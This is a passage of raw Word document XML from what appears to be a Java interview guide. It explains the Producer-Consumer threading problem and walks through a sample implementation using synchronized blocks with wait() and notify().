          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="6E595291">
          <v:rect id="_x0000_i1827" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC56881" w14:textId="5356C396" w:rsidR="00C836C6" w:rsidRPr="00CE4B95" w:rsidRDefault="004F4443">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="270" w:name="_Toc196307750"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain the Producer Consumer problem and how would you implement it using wait(), notify() or BlockingQueue</w:t>
      </w:r>
      <w:r w:rsidR="00C836C6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="270"/>
    </w:p>
    <w:p w14:paraId="63326740" w14:textId="5FAFCA95" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Producer-Consumer problem</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a classic example of a multi-threading problem where there are two types of threads: </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>producers</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. The producer thread produces data and places it into a shared resource (e.g., a buffer or queue), while the consumer thread consumes data from the shared resource. The challenge is to ensure that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAFE72E" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1131"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The producer doesn't add data to a full buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A449CE3" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1131"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The consumer doesn't consume data from an empty buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75438DBF" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1131"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The threads need to wait and notify each other when the buffer is either full or empty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA1DE0F" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262"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Solution using wait() and notify():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD0C116"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The wait() and notify() methods are part of the Object class in Java and are used for inter-thread communication. wait() is used by a thread to release the lock and enter a waiting state until another thread sends a notify() signal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228C4874" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262"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lastRenderedPageBreak/>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC44D59" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1132"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Producer</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> thread produces an item and places it in a buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D84CE9" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1132"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> thread consumes an item from the buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200B70F8" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1132"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>If the buffer is full, the producer waits until the consumer consumes an item.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F9AA44" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1132"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>If the buffer is empty, the consumer waits until the producer adds an item.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1205DA2F" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262"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Example Implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058FEAB6"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Below is a simple implementation of the Producer-Consumer problem using wait() and notify():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2BECFA"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import java.util.LinkedList;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192F411D"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import java.util.Queue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E1A69D" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FC1ADE7"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class ProducerConsumer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64393ABA"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rivate static final int CAPACITY = 5; // The capacity of the buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028EDA2D"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rivate Queue&lt;Integer&gt; buffer = new LinkedList&lt;&gt;(); // Shared buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D549357" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70A543C7"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Producer thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F260B9A"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void produce() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4197D269"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hile (true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786FDA36"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nchronized (this) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7613422D"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If the buffer is full, wait for the consumer to consume</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDE9C3A"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hile (buffer.size() == CAPACITY) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061C3BDC"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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043111C9"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Buffer is full. Producer is waiting...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6983FB99"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ait();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0758038A"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catch (InterruptedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568C6846"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hread.currentThread().interrupt();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63892689"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1F983F32"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2EBD2A72"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Produce an item and add it to the buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A12239E"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int item = (int) (Math.random() * 100); // Generate random item</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14ED33D3"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buffer.add(item);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE9EDCE"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Produced: " + item);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B54F4F8"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notify(); // Notify the consumer that an item has been produced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75468EC1"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2EDF78F3"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4E2FDF6A"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1D9AB6E2" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5366B99E"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Consumer thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EBC11C"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void consume() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5C196D"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hile (true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114844AA"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nchronized (this) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7EEDF9"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If the buffer is empty, wait for the producer to produce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7C367C"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hile (buffer.isEmpty()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54430265"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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BFC43E"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Buffer is empty. Consumer is waiting...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD85969"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ait();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EAF7A5"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catch (InterruptedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2B615D"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hread.currentThread().interrupt();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A430041"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276DA4CB"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3457B7CB"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Consume an item from the buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2432BB7E"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int item = buffer.poll();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494F94F5"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Consumed: " + item);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D126016"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notify(); // Notify the producer that an item has been consumed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FCE0BF"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4446AE11"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6690A23B"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55ACAC64" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C5E54F0"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static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ED6882"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roducerConsumer pc = new ProducerConsumer();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CF1D98" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BAF05F2"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Create producer and consumer threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5483D175"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hread producerThread = new Thread(pc::produce);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6007465A"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hread consumerThread = new Thread(pc::consume);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1222C42A" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ACC2E16"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Start the threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6610EFFC"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roducerThread.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D38943"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consumerThread.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7845ACB3"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23FF354E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10ACC8EE" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262"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Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA512E6" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1133"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Buffer</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: We use a Queue&lt;Integer&gt; (a LinkedList) as the shared buffer where producers will add items and consumers will take items from.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD2E37D" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1133"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Producer Thread</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576DF565" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1133"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The producer thread will add items to the buffer. If the buffer is full (i.e., buffer.size() == CAPACITY), the producer waits until there is space available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306C0C5E" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1133"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The wait() method releases the lock on the buffer and makes the producer thread wait.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C234279" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1133"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Once an item is added to the buffer, the producer thread calls notify() to notify the consumer that an item is available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB9EB02" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1133"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consumer Thread</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A797768" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1133"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The consumer thread will remove items from the buffer. If the buffer is empty (i.e., buffer.isEmpty()), the consumer waits until there is something to consume.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E695CA" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1133"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The wait() method is used to make the consumer thread wait when the buffer is empty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590D4B63" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1133"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
